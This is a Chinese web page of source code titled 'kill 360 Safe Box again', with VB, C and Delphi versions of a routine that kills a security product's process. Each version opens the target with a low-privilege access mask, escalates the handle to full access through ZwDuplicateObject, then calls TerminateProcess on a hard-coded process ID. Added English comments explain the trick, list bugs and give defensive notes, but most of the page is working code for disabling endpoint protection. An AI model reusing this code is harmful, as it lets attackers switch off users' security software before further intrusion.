再次干掉360保险箱 VB/VC/delphi 源码 -电脑资料

电脑资料 时间:2019-01-01 我要投稿

    Option Explicit

    Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long

    Private Declare Function ZwDuplicateObject _

    Lib "NTDLL.DLL" (ByVal SourceProcessHandle As Long, _

    ByVal SourceHandle As Long, _

    ByVal TargetProcessHandle As Long, _

    ByRef TargetHandle As Long, _

    ByVal DesiredAccess As Long, _

    ByVal HandleAttributes As Long, _

    ByVal Options As Long) As Long

    Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long

    ' FcOpenProcess: opens process id p and returns a Long handle value (0 if OpenProcess fails).
    '
    ' What the visible code does:
    '   1. OpenProcess with access mask &H400 (PROCESS_QUERY_INFORMATION only).
    '   2. ZwDuplicateObject inside the current process (-1 is the current-process
    '      pseudo-handle for both source and target), asking for &H1F0FFF
    '      (PROCESS_ALL_ACCESS) on the copy; the last argument 1 is DUPLICATE_CLOSE_SOURCE.
    '   3. Returns whatever ProcessHandle holds after the call.
    '
    ' NOTE(review): the page gives no explanation. The pattern suggests it is aimed at
    ' protections that inspect only the access mask requested when a process is opened;
    ' here the wide rights are requested in the duplicate call instead. Kernel handle
    ' filtering registered through ObRegisterCallbacks is invoked for handle duplication
    ' as well as handle creation, so a filter covering both operations sees this request.
    Function FcOpenProcess&(p&)

    Dim ProcessHandle As Long

    ' NTSTATUS returned by ZwDuplicateObject; stored but never inspected.
    Dim Rtn As Long

    ' &H400 = PROCESS_QUERY_INFORMATION: a low-privilege open.
    ProcessHandle = OpenProcess(&H400, 0, p)

    If ProcessHandle <> 0 Then

    ' Same-process duplicate requesting &H1F0FFF; failure is not detected because Rtn is ignored.
    Rtn = ZwDuplicateObject(-1, ProcessHandle, -1, VarPtr(ProcessHandle), &H1F0FFF, 0, 1)

    FcOpenProcess = ProcessHandle

    End If

    End Function

    ' Button handler: obtains a handle for a hard-coded process id (1884) through
    ' FcOpenProcess and passes it to TerminateProcess with exit code 0.
    '
    ' Review notes grounded in the visible lines:
    '   - TerminateProcess is called even when FcOpenProcess returned 0.
    '   - The return value of TerminateProcess is discarded and the handle is never closed.
    '
    ' Defensive note: an unexpected exit of a protection process is itself a signal
    ' worth alerting on, independent of how the terminating handle was obtained.
    Private Sub Command1_Click()

    Dim ProcessHandle As Long

    ' 1884 is a fixed PID taken from the author's machine; nothing here looks the process up by name.
    ProcessHandle = FcOpenProcess&(1884)

    TerminateProcess ProcessHandle, 0

    End Sub

    ///////////////////////

    /*
     * KillProcess: C version of the same sequence for process id dwProcessId.
     *
     * Visible behaviour: resolve ZwDuplicateObject from ntdll.dll at run time, open the
     * process with 0x400 (PROCESS_QUERY_INFORMATION), duplicate that handle within the
     * current process requesting 0x1F0FFF (PROCESS_ALL_ACCESS) with option 1
     * (DUPLICATE_CLOSE_SOURCE), then call TerminateProcess.
     *
     * Review notes:
     *   - The _ZwDuplicateObject function-pointer typedef is not shown on this page.
     *   - Neither GetModuleHandle nor GetProcAddress is checked for NULL before use.
     *   - The NTSTATUS from ZwDuplicateObject is ignored, and TerminateProcess runs
     *     even when OpenProcess returned NULL.
     *   - No handle is closed on any path.
     *
     * NOTE(review): the page does not say which check this is meant to get past; the
     * shape suggests protections that examine only the access mask on process-open.
     * Handle filtering registered via ObRegisterCallbacks is called for duplicate
     * operations as well as create operations, which is where the wide mask appears here.
     */
    void KillProcess (ULONG dwProcessId)

    {

    HMODULE hNTDLL = GetModuleHandle("ntdll.dll");

    HANDLE  hProcessHandle;

    _ZwDuplicateObject ZwDuplicateObject =

    (_ZwDuplicateObject) GetProcAddress (hNTDLL, "ZwDuplicateObject");

    // The process is opened with access mask 0x400 (PROCESS_QUERY_INFORMATION)

    hProcessHandle = OpenProcess(0x400, FALSE, dwProcessId);

    if(hProcessHandle != NULL)

    {

    // Duplicate the handle inside the current process ((HANDLE)-1), requesting 0x1F0FFF

    ZwDuplicateObject((HANDLE)-1,(PHANDLE)hProcessHandle,(HANDLE)-1,&hProcessHandle,0x1F0FFF,0, 1);

    }

    // Reached on every path, including when OpenProcess failed.
    TerminateProcess(hProcessHandle, 0);

    }

    //////////////////////////////////////

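    既然 VB 和 VC 版本都有了,也就不差 Delphi 版了。三个版本做法相同:先以 0x400(PROCESS_QUERY_INFORMATION)打开目标进程,再用 ZwDuplicateObject 在本进程内复制该句柄并请求 0x1F0FFF(PROCESS_ALL_ACCESS);因此防护方除了检查打开进程的请求外,还需要同样检查句柄复制操作。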

    /////////////////////

    附上D源码

    /////////////////////

    function ZwDuplicateObject( SourceProcessHandle,SourceHandle ,TargetProcessHandle ,TargetHandle,DesiredAccess ,HandleAttributes,Options: LongInt):LongInt stdcall; external ’NTDLL.DLL’ name ’ZwDuplicateObject’;

    // FcOpenProcess: Delphi version. Opens process id p and returns a handle value as
    // Longint; the result is 0 when OpenProcess fails.
    //
    // Visible behaviour: OpenProcess with $400 (PROCESS_QUERY_INFORMATION), then
    // ZwDuplicateObject within the current process (-1 for source and target process)
    // requesting $1F0FFF (PROCESS_ALL_ACCESS) with option 1 (DUPLICATE_CLOSE_SOURCE).
    // The address of ProcessHandle is passed as an Integer, so the listing assumes
    // pointers fit in 32 bits.
    //
    // NOTE(review): the wide access mask appears only in the duplicate call, not in the
    // open call. Handle filtering registered via ObRegisterCallbacks covers duplicate
    // operations as well as create operations.
    Function FcOpenProcess(p:Longint):Longint;

    var

    // Rtn receives the NTSTATUS from ZwDuplicateObject and is never inspected.
    Rtn,ProcessHandle:Longint;

    begin

    // $400 = PROCESS_QUERY_INFORMATION: a low-privilege open.
    ProcessHandle := OpenProcess($400, False, p);

    result:=0;

    If ProcessHandle <> 0 Then

    begin

    // Same-process duplicate requesting $1F0FFF; a failure is not detected.
    Rtn := ZwDuplicateObject(-1, ProcessHandle, -1, Integer(@ProcessHandle), $1F0FFF, 0, 1);

    result := ProcessHandle

    End;

    End;

    // Button handler: obtains a handle for a hard-coded process id (3440) through
    // FcOpenProcess and passes it to TerminateProcess with exit code 0.
    //
    // Review notes: TerminateProcess is called even when FcOpenProcess returned 0, its
    // result is discarded, and the handle is never closed.
    //
    // Defensive note: an unexpected exit of a protection process is itself a signal
    // worth alerting on, independent of how the terminating handle was obtained.
    procedure TForm1.Button1Click(Sender: TObject);

    var

    ProcessHandle :Longint;

    begin

    // 3440 is a fixed PID from the author's machine; no lookup by name happens here.
    ProcessHandle := FcOpenProcess(3440);

    TerminateProcess( ProcessHandle, 0 );

    end;
